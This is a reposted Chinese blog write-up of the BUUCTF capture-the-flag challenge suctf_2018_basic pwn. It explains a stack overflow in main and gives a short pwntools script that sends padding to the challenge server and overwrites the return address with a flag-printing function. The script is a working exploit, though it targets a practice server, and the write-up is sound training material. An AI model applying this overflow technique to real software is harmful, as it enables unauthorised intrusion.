[BUUCTF]PWN——suctf_2018_basic pwn

其他 2021-03-23 06:40:45 阅读次数: 0

suctf_2018_basic pwn

步骤

例行检查，64位程序，开启了RELRO和NX
试运行一下程序，看看大概的情况
64位ida载入，检索字符串的时候发现了读出flag的函数，flag_addr=0x401157

main（）

s存在溢出，简单的覆盖返回地址到后门函数类型的题目

完整exp

from pwn import *

r=remote('node3.buuoj.cn',25779)
flag_addr=0x401157

payload='a'*(0x110+8)+p64(flag_addr)

r.sendline(payload)

r.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/mcmuyanga/article/details/113543146

[BUUCTF]PWN——suctf_2018_basic pwn

pwn

【BUUCTF - PWN】PWN5

【BUUCTF - PWN】rip

【BUUCTF - PWN】babyrop

buuctf-pwn babyrop

BUUCTF(Pwn) rip

buuctf pwn（1~4）

buuctf pwn （21~24）

buuctf pwn（13~16）

buuctf pwn （17~20）

buuctf pwn（9~12）

buuctf pwn（5~8）

【BUUCTF - PWN】pwn1_sctf_2016

pwn-pwn4

pwn-pwn2

Pwn-pwn-200

BUUCTF PWN部分题目wp

buuctf --pwn part2

【BUUCTF - PWN】baby_rop

BUUCTF-PWN-cmcc_simplerop

[BUUCTF]PWN——jarvisoj_fm

Pwn With longjmp

PWN入门

UNCTF pwn

pwn unlink

pwn shellcode

pwn hacknote

PWN补充

hello pwn

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

周排行

Python环境安装与基础语法（1）——计算机基础知识

IMU预积分

ADAS中的LDW、FCW、BSD、LCA、ACC、AEB、APA、DMS代表的含义

B站笔试两道题

skyeye arm 硬件虚拟机环境的搭建

Web前端静态页面示例

数组-合并排序数组 II-简单

springcloud之版本问题启动报错

面向对象-------------匿名对象(六)

输入URL到页面呈现中间发生了什么？

每日归档

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)